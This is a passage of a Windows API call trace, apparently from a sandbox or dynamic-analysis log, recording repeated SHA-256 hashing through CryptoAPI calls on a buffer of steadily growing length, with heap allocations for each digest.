pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acff00 [0190.238] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acff00, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acff00, pdwDataLen=0xce0bc) returned 1 [0190.238] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.238] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.238] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821dd0) returned 1 [0190.238] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.238] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x620, dwFlags=0x0) returned 1 [0190.238] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acffc0 [0190.238] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32acffc0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acffc0, pdwDataLen=0xce0bc) returned 1 [0190.238] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.238] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0190.238] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.239] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.239] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x640, dwFlags=0x0) returned 1 [0190.239] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.239] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfc90 [0190.239] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32acfc90, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfc90, pdwDataLen=0xce0bc) returned 1 [0190.239] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.239] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.239] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.240] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.240] CryptHashData (hHash=0x3396f820, pbData=0x32349170, dwDataLen=0x660, dwFlags=0x0) returned 1 [0190.240] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfe40 [0190.240] CryptGetHashParam (in: hHash=0x3396f820, dwParam=0x2, pbData=0x32acfe40, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfe40, pdwDataLen=0xce0bc) returned 1 [0190.240] CryptDestroyHash (hHash=0x3396f820) returned 1 [0190.240] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.240] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.240] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.240] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x680, dwFlags=0x0) returned 1 [0190.240] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0410 [0190.240] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32ad0410, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0410, pdwDataLen=0xce0bc) returned 1 [0190.240] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.240] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.241] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.241] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.241] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0190.241] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0530 [0190.241] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32ad0530, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0530, pdwDataLen=0xce0bc) returned 1 [0190.241] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.241] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.241] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.242] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.242] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0190.242] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad04a0 [0190.242] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32ad04a0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad04a0, pdwDataLen=0xce0bc) returned 1 [0190.242] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.242] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.242] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.242] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.242] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0190.242] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.243] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfcc0 [0190.243] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acfcc0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfcc0, pdwDataLen=0xce0bc) returned 1 [0190.243] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.243] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.243] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ad0) returned 1 [0190.243] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.243] CryptHashData (hHash=0x3396f4a0, pbData=0x32349170, dwDataLen=0x700, dwFlags=0x0) returned 1 [0190.243] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.243] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfd50 [0190.243] CryptGetHashParam (in: hHash=0x3396f4a0, dwParam=0x2, pbData=0x32acfd50, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfd50, pdwDataLen=0xce0bc) returned 1 [0190.243] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0190.243] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0190.243] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338223d0) returned 1 [0190.244] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.244] CryptHashData (hHash=0x3396f190, pbData=0x32349170, dwDataLen=0x720, dwFlags=0x0) returned 1 [0190.244] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.244] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfd80 [0190.244] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acfd80, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfd80, pdwDataLen=0xce0bc) returned 1 [0190.244] CryptDestroyHash (hHash=0x3396f190) returned 1 [0190.244] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0190.244] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338234d0) returned 1 [0190.245] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.245] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x740, dwFlags=0x0) returned 1 [0190.245] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfff0 [0190.245] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acfff0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfff0, pdwDataLen=0xce0bc) returned 1 [0190.245] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.245] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0190.245] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338237d0) returned 1 [0190.245] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.245] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x760, dwFlags=0x0) returned 1 [0190.245] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfe70 [0190.245] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acfe70, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfe70, pdwDataLen=0xce0bc) returned 1 [0190.245] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.245] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0190.245] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822fd0) returned 1 [0190.246] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.246] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x780, dwFlags=0x0) returned 1 [0190.246] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0710 [0190.246] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32ad0710, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0710, pdwDataLen=0xce0bc) returned 1 [0190.246] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.246] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0190.246] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.248] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.248] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0190.248] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfea0 [0190.248] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acfea0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfea0, pdwDataLen=0xce0bc) returned 1 [0190.249] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.249] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.249] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822cd0) returned 1 [0190.249] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.249] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0190.249] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.249] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0380 [0190.249] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32ad0380, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0380, pdwDataLen=0xce0bc) returned 1 [0190.249] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.249] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0190.249] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.250] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.250] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0190.250] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.250] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0590 [0190.250] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32ad0590, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0590, pdwDataLen=0xce0bc) returned 1 [0190.250] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.250] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.250] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338238d0) returned 1 [0190.250] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.251] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0x800, dwFlags=0x0) returned 1 [0190.251] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad02c0 [0190.251] CryptGetHashParam (in: hHash=0x3396f3c0, dwParam=0x2, pbData=0x32ad02c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad02c0, pdwDataLen=0xce0bc) returned 1 [0190.251] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.251] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0190.251] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.251] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.251] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x820, dwFlags=0x0) returned 1 [0190.251] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfed0 [0190.251] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acfed0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acfed0, pdwDataLen=0xce0bc) returned 1 [0190.251] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.251] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.251] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.252] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.252] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x840, dwFlags=0x0) returned 1 [0190.252] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acff30 [0190.252] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acff30, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acff30, pdwDataLen=0xce0bc) returned 1 [0190.252] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.252] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.252] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.252] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.252] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0x860, dwFlags=0x0) returned 1 [0190.253] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acff60 [0190.253] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acff60, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32acff60, pdwDataLen=0xce0bc) returned 1 [0190.253] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.253] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.253] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823bd0) returned 1 [0190.253] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.253] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x880, dwFlags=0x0) returned 1 [0190.253] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0020 [0190.253] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32ad0020, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0020, pdwDataLen=0xce0bc) returned 1 [0190.253] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.253] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0190.253] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.254] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.254] CryptHashData (hHash=0x3396f6d0, pbData=0x32349170, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0190.254] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.254] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0230 [0190.254] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32ad0230, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0230, pdwDataLen=0xce0bc) returned 1 [0190.254] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0190.254] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.254] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.255] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.255] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0190.255] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0050 [0190.255] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32ad0050, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0050, pdwDataLen=0xce0bc) returned 1 [0190.255] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.255] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.255] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338237d0) returned 1 [0190.255] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.255] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0190.255] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0110 [0190.255] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32ad0110, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0110, pdwDataLen=0xce0bc) returned 1 [0190.255] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.255] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0190.255] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.256] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.256] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0x900, dwFlags=0x0) returned 1 [0190.256] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad05c0 [0190.256] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32ad05c0, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad05c0, pdwDataLen=0xce0bc) returned 1 [0190.256] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.256] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.256] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338238d0) returned 1 [0190.257] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.257] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x920, dwFlags=0x0) returned 1 [0190.257] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.257] RtlAllocateHeap (HeapHandle=0x2150000, 